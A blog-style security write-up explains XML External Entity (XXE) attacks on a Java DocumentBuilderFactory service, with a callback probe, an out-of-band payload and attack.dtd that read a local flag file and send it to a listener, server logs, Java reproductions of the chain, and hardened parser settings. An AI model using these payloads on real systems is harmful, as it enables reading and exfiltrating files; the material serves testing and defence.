Parsers are notoriously prone to bugs and present one of the best attack surfaces for exploitation. I was working on a service that takes XML input and performs some parsing, so I decided to check whether, and how, it could be exploited.

Since I have access to the source, here is the snippet showing how the service handles XML:

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setIgnoringElementContentWhitespace(true);
factory.setNamespaceAware(true);
DocumentBuilder parser = factory.newDocumentBuilder();
....
input = parser.parse(recieved);

So there is just a basic DocumentBuilderFactory with a little additional configuration. I initially assumed, as most people probably do, that since we just want to parse an XML file there should be no issues.

Turns out this is very wrong: just parsing the input is dangerous in itself. The DocumentBuilder is unsafe unless it is configured properly. It works on the blacklist principle: a lot of unsafe options are allowed by default and have to be switched off explicitly. I assume it is left like this for backward compatibility with older code.

So let's take a look at how this setup could be exploited.

For the attacker server, I am just gonna use Python's simple HTTP server:

python -m http.server 8000 --bind 127.0.0.1

One of the first tests we can do is check if the service will do a callback to our server if presented with a specially crafted XML.

<?xml version="1.0"?>
    <!DOCTYPE doc [
      <!ENTITY % ent1 SYSTEM "http://127.0.0.1:8000/test">
      %ent1;
    ]>

If the service is vulnerable, we will see the test resource being requested from our Python server.

To better understand how this test works, we need to understand the XML we sent. In it, we define a DTD (Document Type Definition). The syntax for an internal DTD (one defined within the XML document) is:
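The same callback test can be sketched entirely in Java. This is a minimal, local-only sketch: the class name CallbackProbe is made up for illustration, the JDK's built-in com.sun.net.httpserver.HttpServer stands in for the Python server, and the port is picked by the OS instead of being fixed to 8000. I also added an empty root element so the document is complete. It assumes the JDK's default parser settings.

```java
import com.sun.net.httpserver.HttpServer;
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.net.InetSocketAddress;
import java.nio.charset.StandardCharsets;
import java.util.List;
import java.util.concurrent.CopyOnWriteArrayList;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.xml.sax.SAXException;

public class CallbackProbe {
    /** Parses the callback payload with a default-ish factory and returns the paths the listener saw. */
    public static List<String> probe() throws Exception {
        List<String> seen = new CopyOnWriteArrayList<>();
        // Throwaway listener on an ephemeral loopback port (illustrative stand-in for the attacker server).
        HttpServer server = HttpServer.create(new InetSocketAddress("127.0.0.1", 0), 0);
        server.createContext("/", exchange -> {
            seen.add(exchange.getRequestURI().getPath());
            exchange.sendResponseHeaders(200, -1); // 200 with an empty body
            exchange.close();
        });
        server.start();
        try {
            int port = server.getAddress().getPort();
            String xml = "<?xml version=\"1.0\"?>\n"
                    + "<!DOCTYPE doc [\n"
                    + "  <!ENTITY % ent1 SYSTEM \"http://127.0.0.1:" + port + "/test\">\n"
                    + "  %ent1;\n"
                    + "]>\n"
                    + "<doc/>";
            // Same configuration as the service snippet: nothing security related is set.
            DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
            factory.setIgnoringElementContentWhitespace(true);
            factory.setNamespaceAware(true);
            DocumentBuilder parser = factory.newDocumentBuilder();
            try {
                parser.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            } catch (SAXException | IOException ignored) {
                // Only the outgoing request matters here, not whether parsing succeeds.
            }
        } finally {
            server.stop(0);
        }
        return seen;
    }

    public static void main(String[] args) throws Exception {
        System.out.println("Requested paths: " + probe());
    }
}
```

If the parser resolves the external parameter entity, the returned list contains /test, which is the Java equivalent of seeing the request show up in the Python server log.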

<!DOCTYPE root_element [DTD]>

There are some rules we should follow (but parsers are usually forgiving):

  • The document type declaration must be placed between the XML declaration and the first element (root element) in the document - well-formedness constraint.
  • The keyword DOCTYPE must be followed by the name of the root element in the XML document - validity constraint.
  • The keyword DOCTYPE must be in upper case

There are also external and combined DTD definitions, but we don't need them for this test. For more information about DTD definitions you can take a look here or here.

Inside the DTD, we are defining an entity. Entities reference data that acts as an abbreviation or can be found at an external location. They are used to reduce the entry of repetitive information and also allow for easier editing.

In this DTD we are defining an external (parsed) parameter entity. Like all other parameter entities, it can only be used inside the DTD.

The syntax for the external parameter entity is:

<!ENTITY % name SYSTEM "URI">
%name;

Basically, with this DTD we are telling the parser to visit the URI we provide to find the definition of our parameter entity, and to replace %name; with its value. This in itself is not a big security issue, but it is a necessary part of the other attacks.

We can achieve the same effect with:

<?xml version="1.0"?>
    <!DOCTYPE doc [
      <!ELEMENT elm1 ANY >
      <!ENTITY ent1 SYSTEM "http://127.0.0.1:8000/test">
    ]>
    <elm1>&ent1;</elm1>

Here we use an element type declaration to define a new element that may appear in the XML document. The syntax for the element is:

<!ELEMENT name allowable_contents>

The keyword ANY just allows all types of content in the element. We also define an external (parsed) general entity. General entities can only replace text inside the XML document instance, not inside the DTD. The syntax for an external (parsed) general entity is:

<!ENTITY name SYSTEM "URI">

More information regarding entities can be found here.
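To see what "replacing text inside the document instance" means in practice, here is a small Java sketch that points the general entity at a local temporary file instead of an HTTP URL. The class name GeneralEntityDemo and the temp file are made up for illustration, and the sketch assumes the JDK's default parser settings, which may differ on other implementations or versions.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

public class GeneralEntityDemo {
    /** Writes fileContent to a temp file, references it as &ent1; and returns the parsed element text. */
    public static String expand(String fileContent) throws Exception {
        Path target = Files.createTempFile("xxe-demo", ".txt");
        try {
            Files.write(target, fileContent.getBytes(StandardCharsets.UTF_8));
            String xml = "<?xml version=\"1.0\"?>\n"
                    + "<!DOCTYPE doc [\n"
                    + "  <!ELEMENT elm1 ANY >\n"
                    + "  <!ENTITY ent1 SYSTEM \"" + target.toUri() + "\">\n"
                    + "]>\n"
                    + "<elm1>&ent1;</elm1>";
            // Default factory: no security related features are touched.
            DocumentBuilder parser = DocumentBuilderFactory.newInstance().newDocumentBuilder();
            Document doc = parser.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            // If the entity was resolved, the element text is the file content.
            return doc.getDocumentElement().getTextContent();
        } finally {
            Files.deleteIfExists(target);
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println(expand("hello from a local file"));
    }
}
```

When the parser resolves the entity, the text of elm1 is the content of the file, so any service that echoes parsed XML back to the caller would echo the file as well.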

These types of attacks are called XXE (XML External Entity).

So far, we have only seen how to get a callback from the XML parser, which is not really useful on its own. The service I was testing doesn't return any XML output, which complicates things, so we have to go out-of-band (OOB-XXE).

If the service returns XML output, we can just do a simpler in-band attack. I won't cover it here, but there are many resources available online.

So how can we get data? We have already seen that the service will request a URL we provide, and this can be abused to get data back.

For testing, we will create the flag.txt file on the C drive.

Our exploit:

<?xml version="1.0"?>
    <!DOCTYPE doc [
      <!ELEMENT elm1 ANY >
      <!ENTITY % file SYSTEM "file:///flag.txt">
      <!ENTITY % ent1 SYSTEM "http://127.0.0.1:8000/attack.dtd">
      %ent1;
    ]>
    <elm1>&res;</elm1>

attack.dtd:

<!ENTITY % all "<!ENTITY res SYSTEM 'http://127.0.0.1:8000/%file;'>">
%all;

The exploit looks a bit more complicated than the previous ones due to a well-formedness constraint. In the internal DTD subset (which is quite strict), references to parameter entities are not allowed within markup declarations. We have to put that declaration in an external DTD (a separate file).

We also need a parameter entity (%all;) to build the declaration of a general entity (res) whose URL contains the content of our target file. It has to be a general entity, because only general entities can be referenced in the document body.

If the attack is successful, we should see the content of the flag.txt we created in our server log.

Serving HTTP on 127.0.0.1 port 8000 (http://127.0.0.1:8000/) ...
127.0.0.1 - - [09/Feb/2020 17:20:58] "GET /attack.dtd HTTP/1.1" 200 -
127.0.0.1 - - [09/Feb/2020 17:20:58] code 404, message File not found
127.0.0.1 - - [09/Feb/2020 17:20:58] "GET /U%20got%20the%20flag! HTTP/1.1" 404 -
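
The whole chain can also be reproduced locally in one Java file, which is handy for checking whether a given parser configuration is affected. This is only a sketch under a few assumptions: the class name OobXxeDemo is hypothetical, the flag is a temporary file rather than flag.txt on the C drive, the secret is a single short token without spaces or newlines, and an embedded JDK HttpServer on an OS-chosen port plays the attacker server. Whether the request actually goes out depends on the JDK version and its default settings.

```java
import com.sun.net.httpserver.HttpServer;
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.net.InetSocketAddress;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.List;
import java.util.concurrent.CopyOnWriteArrayList;
import javax.xml.parsers.DocumentBuilderFactory;
import org.xml.sax.SAXException;

public class OobXxeDemo {
    /** Runs the OOB payload against a default parser and returns the paths requested from the listener. */
    public static List<String> run(String secret) throws Exception {
        Path flag = Files.createTempFile("flag", ".txt");
        Files.write(flag, secret.getBytes(StandardCharsets.UTF_8));
        List<String> requests = new CopyOnWriteArrayList<>();
        HttpServer server = HttpServer.create(new InetSocketAddress("127.0.0.1", 0), 0);
        String base = "http://127.0.0.1:" + server.getAddress().getPort() + "/";
        // Same content as attack.dtd above, with the listener address filled in.
        String dtd = "<!ENTITY % all \"<!ENTITY res SYSTEM '" + base + "%file;'>\">\n%all;";
        server.createContext("/", exchange -> {
            String path = exchange.getRequestURI().getPath();
            requests.add(path); // plays the role of the server log
            if (path.equals("/attack.dtd")) {
                byte[] body = dtd.getBytes(StandardCharsets.UTF_8);
                exchange.sendResponseHeaders(200, body.length);
                exchange.getResponseBody().write(body);
            } else {
                exchange.sendResponseHeaders(404, -1); // like "File not found" in the log
            }
            exchange.close();
        });
        server.start();
        try {
            String xml = "<?xml version=\"1.0\"?>\n"
                    + "<!DOCTYPE doc [\n"
                    + "  <!ELEMENT elm1 ANY >\n"
                    + "  <!ENTITY % file SYSTEM \"" + flag.toUri() + "\">\n"
                    + "  <!ENTITY % ent1 SYSTEM \"" + base + "attack.dtd\">\n"
                    + "  %ent1;\n"
                    + "]>\n"
                    + "<elm1>&res;</elm1>";
            try {
                DocumentBuilderFactory.newInstance().newDocumentBuilder()
                        .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            } catch (SAXException | IOException expected) {
                // The 404 for the exfiltration URL makes parsing fail; the request was already sent.
            }
        } finally {
            server.stop(0);
            Files.deleteIfExists(flag);
        }
        return requests;
    }

    public static void main(String[] args) throws Exception {
        System.out.println("Requested paths: " + run("FLAG-1234"));
    }
}
```

On an affected configuration the returned list holds /attack.dtd followed by a path made of the secret, mirroring the two GET lines in the log above.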

For additional stealth, we can also move the line:

<!ENTITY % file SYSTEM "file:///flag.txt">

to attack.dtd, hiding the information about the file we are extracting from the XML we send.

There are also many other XML-based attacks, like Billion Laughs, Quadratic Blowup, etc., but I won't cover them here.

So, as a closing note: definitely double-check security best practices when using parsers.

More secure parsing code:

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);  // <----- added
factory.setIgnoringElementContentWhitespace(true);
factory.setNamespaceAware(true);
DocumentBuilder parser = factory.newDocumentBuilder();
....
input = parser.parse(recieved);
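
How much FEATURE_SECURE_PROCESSING restricts external entities depends on the JAXP implementation and version in use, so I would not rely on it alone. A stricter variant, if the service never needs DTDs, is to reject DOCTYPE declarations altogether. The sketch below assumes a Xerces-based parser (such as the one bundled with the JDK) that understands the disallow-doctype-decl feature. The class and method names are made up for illustration.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.SAXParseException;

public class HardenedParser {
    /** Builds a parser that refuses any document carrying a DOCTYPE declaration. */
    public static DocumentBuilder newHardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Xerces feature: fail with a fatal error as soon as a DOCTYPE is seen.
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);
        factory.setIgnoringElementContentWhitespace(true);
        factory.setNamespaceAware(true);
        return factory.newDocumentBuilder();
    }

    /** Returns true if the hardened parser rejects the given XML with a parse error. */
    public static boolean rejectsDoctype(String xml) throws Exception {
        try {
            newHardenedBuilder().parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return false;
        } catch (SAXParseException e) {
            return true;
        }
    }

    public static void main(String[] args) throws Exception {
        String payload = "<?xml version=\"1.0\"?><!DOCTYPE doc ["
                + "<!ENTITY % ent1 SYSTEM \"http://127.0.0.1:8000/test\">%ent1;]><doc/>";
        System.out.println("payload rejected: " + rejectsDoctype(payload));
        System.out.println("plain XML rejected: " + rejectsDoctype("<doc/>"));
    }
}
```

The trade-off is that legitimate documents with a DOCTYPE are refused too, so this only fits services that control their input format.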

- F3real